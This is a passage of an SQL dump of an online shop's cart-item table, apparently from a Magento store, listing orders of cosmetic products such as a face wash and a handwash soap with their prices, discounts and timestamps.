(419, 1132, '2026-04-22 17:47:21', '2026-04-22 17:47:21', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(420, 1133, '2026-04-23 01:05:59', '2026-04-23 01:05:59', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(421, 1135, '2026-04-23 08:12:08', '2026-04-23 08:12:08', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(422, 1137, '2026-04-23 16:41:39', '2026-04-23 16:41:39', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(423, 1140, '2026-04-24 01:00:55', '2026-04-24 01:00:55', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(424, 1142, '2026-04-24 09:15:52', '2026-04-24 09:15:52', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(425, 1144, '2026-04-24 18:33:39', '2026-04-24 18:33:39', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(426, 1146, '2026-04-24 23:08:27', '2026-04-24 23:08:27', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(427, 1148, '2026-04-25 04:06:59', '2026-04-25 04:06:59', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(428, 1150, '2026-04-25 12:28:38', '2026-04-25 12:28:38', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(429, 1152, '2026-04-25 20:58:37', '2026-04-25 20:58:37', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(430, 1154, '2026-04-26 05:18:22', '2026-04-26 05:18:22', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(431, 1155, '2026-04-26 13:36:29', '2026-04-26 13:36:29', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(432, 1157, '2026-04-26 14:27:41', '2026-04-26 14:27:41', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(433, 1158, '2026-04-26 14:50:09', '2026-04-26 14:50:09', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(434, 1159, '2026-04-26 22:00:18', '2026-04-26 22:00:18', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(435, 1161, '2026-04-27 03:21:04', '2026-04-27 03:21:04', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(436, 1165, '2026-04-27 03:22:03', '2026-04-27 03:22:03', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(437, 1167, '2026-04-27 03:22:25', '2026-04-27 03:22:25', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(438, 1168, '2026-04-27 06:20:50', '2026-04-27 06:20:50', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(439, 1170, '2026-04-27 14:16:01', '2026-04-27 14:16:01', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(440, 1172, '2026-04-27 18:42:11', '2026-04-27 18:42:11', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(441, 1177, '2026-04-27 21:44:44', '2026-04-27 21:44:44', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(442, 1178, '2026-04-27 22:25:47', '2026-04-27 22:25:47', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(443, 1181, '2026-04-28 00:44:31', '2026-04-28 00:44:31', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(444, 1182, '2026-04-28 05:06:08', '2026-04-28 05:06:08', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(445, 1186, '2026-04-28 08:34:45', '2026-04-28 08:34:45', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(446, 1188, '2026-04-28 12:47:27', '2026-04-28 12:47:27', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(447, 1192, '2026-04-28 20:24:01', '2026-04-28 20:24:01', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(448, 1194, '2026-04-28 22:55:09', '2026-04-28 22:55:09', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(449, 1195, '2026-04-29 03:53:19', '2026-04-29 03:53:19', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(450, 1196, '2026-04-29 05:12:37', '2026-04-29 05:12:37', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(451, 1198, '2026-04-29 07:45:26', '2026-04-29 07:45:26', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(452, 1199, '2026-04-29 11:27:50', '2026-04-29 11:27:50', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(453, 1201, '2026-04-29 19:05:17', '2026-04-29 19:05:17', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(454, 1203, '2026-04-30 02:37:53', '2026-04-30 02:37:53', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(455, 1206, '2026-04-30 10:14:07', '2026-04-30 10:14:07', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(456, 1208, '2026-04-30 17:55:24', '2026-04-30 17:55:24', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(457, 1211, '2026-05-01 01:17:19', '2026-05-01 01:17:19', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(458, 1213, '2026-05-01 08:53:37', '2026-05-01 08:53:37', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(459, 1214, '2026-05-01 10:39:32', '2026-05-01 10:39:32', 2059, 1, NULL, 0, 'HGF64', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 422.0000, 422.0000, NULL, 20.0000, 84.4000, 84.4000, 0.0000, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 422.0000, 422.0000, 422.0000, 422.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(460, 1218, '2026-05-01 10:40:00', '2026-05-01 10:40:00', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(461, 1220, '2026-05-01 10:40:29', '2026-05-01 10:40:29', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(462, 1222, '2026-05-01 16:20:45', '2026-05-01 16:20:45', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(463, 1225, '2026-05-01 23:49:32', '2026-05-01 23:49:32', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(464, 1227, '2026-05-02 07:17:01', '2026-05-02 07:17:01', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);
INSERT INTO `quote_item` (`item_id`, `quote_id`, `created_at`, `updated_at`, `product_id`, `store_id`, `parent_item_id`, `is_virtual`, `sku`, `name`, `description`, `applied_rule_ids`, `additional_data`, `is_qty_decimal`, `no_discount`, `weight`, `qty`, `price`, `base_price`, `custom_price`, `discount_percent`, `discount_amount`, `base_discount_amount`, `tax_percent`, `tax_amount`, `base_tax_amount`, `row_total`, `base_row_total`, `row_total_with_discount`, `row_weight`, `product_type`, `base_tax_before_discount`, `tax_before_discount`, `original_custom_price`, `redirect_url`, `base_cost`, `price_incl_tax`, `base_price_incl_tax`, `row_total_incl_tax`, `base_row_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `gift_message_id`, `free_shipping`, `weee_tax_applied`, `weee_tax_applied_amount`, `weee_tax_applied_row_amount`, `weee_tax_disposition`, `weee_tax_row_disposition`, `base_weee_tax_applied_amount`, `base_weee_tax_applied_row_amnt`, `base_weee_tax_disposition`, `base_weee_tax_row_disposition`) VALUES
(465, 1230, '2026-05-02 15:17:22', '2026-05-02 15:17:22', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(466, 1232, '2026-05-02 23:12:14', '2026-05-02 23:12:14', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(467, 1234, '2026-05-03 06:42:36', '2026-05-03 06:42:36', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(468, 1235, '2026-05-03 07:09:39', '2026-05-03 07:09:39', 2054, 1, NULL, 0, 'FF44', 'G clean Handwash Liquid Soap Pump 200ml   200.00 ৳ ', NULL, NULL, NULL, 0, 0, 0.0000, 1.0000, 32.0000, 32.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
